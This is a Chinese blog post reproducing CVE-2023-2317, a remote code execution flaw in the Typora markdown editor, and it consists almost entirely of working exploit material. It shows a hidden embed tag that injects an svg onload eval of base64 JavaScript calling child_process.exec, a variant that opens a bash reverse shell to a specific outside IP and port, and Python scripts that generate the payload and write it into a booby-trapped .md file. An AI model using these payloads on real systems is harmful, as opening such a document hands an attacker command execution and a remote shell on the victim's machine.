漏洞复现:CVE-2023-2317 【Typora 远程代码执行漏洞】
jerem1ah Lv4
  2023-09-17 23:13:55 2023-09-17 23:13   2024-05-18 21:57:17  

漏洞复现:CVE-2023-2317 【Typora 远程代码执行漏洞】

https://www.cnblogs.com/bktown/p/17673366.html

1
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
1
D:\01Solfware\01normal\11typora\Typora\resources\updater\updater.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<script type="text/javascript">
      var curVersion = /[?&]curVersion=([^&]+)/.exec(window.location.search)[1];
      var newVersion = /[?&]newVersion=([^&]+)/.exec(window.location.search)[1];
      var releaseNoteLink = decodeURIComponent(/[?&]releaseNoteLink=([^&]+)/.exec(window.location.search)[1]);
      var hideAutoUpdates = /[?&]hideAutoUpdates=([^&]+)/.exec(window.location.search)[1] == "true";
      var labels = JSON.parse(decodeURIComponent(/[?&]labels=([^&]+)/.exec(window.location.search)[1]));

      document.querySelector("#sum").innerText = labels[4] + " " + labels[5].replace("$1", newVersion).replace("$2", curVersion);
      document.querySelectorAll("[data-label]").forEach(function(dom){
        dom.innerHTML = labels[dom.getAttribute("data-label") - 0];
      });
      document.querySelector("#release-panel").src = releaseNoteLink;

      var autoUpdateInput = document.querySelector("#preference-enable-auto-update")
      autoUpdateInput.checked = !!isAutoUpdateEnabled;
      autoUpdateInput.onchange = toggleAutoUpdate;
      if(hideAutoUpdates) {
        document.querySelector("#preference-enable-auto-update-wrapper").style.display = "none";
        document.querySelector("#skip-this-version-btn-group").style.display = "none";
      }
    </script>
1
updater.html?curVersion=1&newVersion=2&releaseNoteLink=3&hideAutoUpdates=false&labels=["<input%20value=test>","22","33","44","55","66","77"]
1
[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]
1
["","<svg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))></svg>","","","",""]
1
2
3
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)]
1
2
3
4
5
6
7
8
9
10
11
这个标签包含了可疑的恶意代码,我不建议执行它。具体来看:
<svg> - 表示这是一个SVG图像标签
onload - 是一个事件属性,表示一旦SVG图像加载完成就执行该事件中的代码
atob - 是一个函数,用于解码base64编码的字符串
base64编码的字符串 - 包含了一段恶意的JavaScript代码,解码后大概功能是:
1. 导入child_process模块
2. 根据系统平台(Windows或Linux)执行不同的系统命令
   Windows下执行calc计算器
   Linux下执行gnome-calculator开启计算器
3. 这样就实现了无需用户交互,SVG加载时在后台执行系统命令的效果
所以这段代码包含了典型的XSS (跨站脚本) 攻击特征,可能是某种捣蛋或恶意代码,执行了意料之外的操作。为了安全起见,不要在不信任的页面中打开或执行该SVG图像。 (已编辑) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
navigator.platform.substr(0,5)]


这个代码片段似乎是用于检测用户的操作系统平台,然后根据平台执行不同的命令。
具体来看:
navigator.platform:获取浏览器运行的操作系统平台信息。
navigator.platform.substr(0,5):取平台信息的前5个字符。
对Windows系统,platform的值类似"Win32"或"Win64"。
取前5个字符结果为"Win32"。
对Linux系统,platform的值类似"Linux x86_64"。
取前5个字符结果为"Linux"。
所以这里是通过取平台信息的前5个字符,来判断用户的操作系统是Windows还是Linux。
然后根据平台结果,在后续代码中执行不同的命令。
这种根据用户操作系统执行不同代码的方式,在一些恶意代码或者黑客攻击中很常见。
需要谨慎对待并仔细审查这种代码,不要在不信任的场景中执行,以防存在隐藏的恶意行为。
总体来说,这段代码本身可能无害,但在某些上下文中可能被用做不好的用途。 (已编辑) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)]解释一下代码


这段代码是用于根据操作系统执行不同命令的,具体功能如下:
1. 定义了一个对象,键是操作系统,值是要执行的命令字符串:
  {
    Win32: 'calc',
    Linux: 'gnome-calculator -e "Typora RCE PoC"'
  }
2. navigator.platform.substr(0,5) 用于获取浏览器运行的操作系统的前5个字符,如果是Windows则得到"Win32",Linux则得到"Linux"。
3. 然后根据操作系统的键,从对象中取出对应要执行的命令。
4. 最后调用child_process.exec()执行取出的命令。
所以整段代码的效果是:
- 在Windows上,会启动计算器程序calc。
- 在Linux上,会打开gnome-calculator计算器,并在其中执行一段代码。
根据"Typora RCE PoC"的提示,这似乎是某种Typora编辑器的远程代码执行(RCE)漏洞的概念验证(PoC)代码。
综上所述,这段代码包含了根据操作系统执行不同本地命令的功能,看起来存在不良用途,不建议在不信任的场景下执行。 (已编辑) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

({Win32: 'calc', Linux: 'bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'})[navigator.platform.substr(0,5)]

reqnode('child_process').exec(({Win32: 'calc', Linux: 'bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'})[navigator.platform.substr(0,5)])

cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk=

["","<svg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))></svg>","","","",""]


[%22%22,%22%3Csvg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))%3E%3C/svg%3E%22,%22%22,%22%22,%22%22,%22%22]


<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3Csvg/onload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMzkuMTA1LjUxLjExLzc3NzkgMD4mMSInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))%3E%3C/svg%3E%22,%22%22,%22%22,%22%22,%22%22]">

1
2
1.完全编码和不完全编码的区别就是对
!*'();:@&=+$,/?%#[]
1
2
3
4
5
6
7
8
9
10
11
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
command = '''gnome-calculator -e "Typora RCE PoC";bash -c "bash -i >& /dev/tcp/39.105.51.11/7779 0>&1"'''
payload = '''reqnode('child_process').exec(({Win32: 'calc', Linux: \''''+command+'''\'})[navigator.platform.substr(0,5)])'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
argument_urlencode = quote(argument_raw,safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
command = '''gnome-calculator -e "Typora RCE PoC";'''
payload = '''reqnode('child_process').exec(({Win64: 'calc', Linux: \''''+command+'''\'})[navigator.platform.substr(0,5)])'''

payload = '''reqnode('child_process').exec('calc')'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
argument_urlencode = quote(argument_raw,safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)

final_exp = final_exp + '\n\n' + '```\ntest\n```'
with open('test_exp.md','w') as f:
    f.write(final_exp)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import base64
from urllib.parse import quote

# command = '''gnome-calculator -e "Typora RCE PoC"'''
# command1 = '''calc''' #弹出计算机命令
command1 = '''mshta vbscript:msgbox("I am hack",64,"hackyou")(window.close)'''
# command2 = '''gnome-calculator -e "Typora RCE PoC";'''
# payload = '''reqnode('child_process').exec(({Win64: \''''+command1+'''\', Linux: \''''+command2+'''\'})[navigator.platform.substr(0,5)])'''
payload = '''reqnode('child_process').exec(\''''+command1+'''\')'''
payload_base64 = base64.b64encode(payload.encode()).decode()
argument_raw = f'''["","<svg/onload=top.eval(atob('{payload_base64}'))></svg>","","","",""]'''
argument_urlencode = quote(argument_raw,safe="!*'();:@&=+$,?%#[]")
final_exp = f'''<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels={argument_urlencode}">'''
print(final_exp)
final_exp = final_exp + '\n\n' + '```\ntest\n```\n'
with open('test_exp.md','w') as f:
    f.write(final_exp)
 Comments
  1. 漏洞复现:CVE-2023-2317 【Typora 远程代码执行漏洞】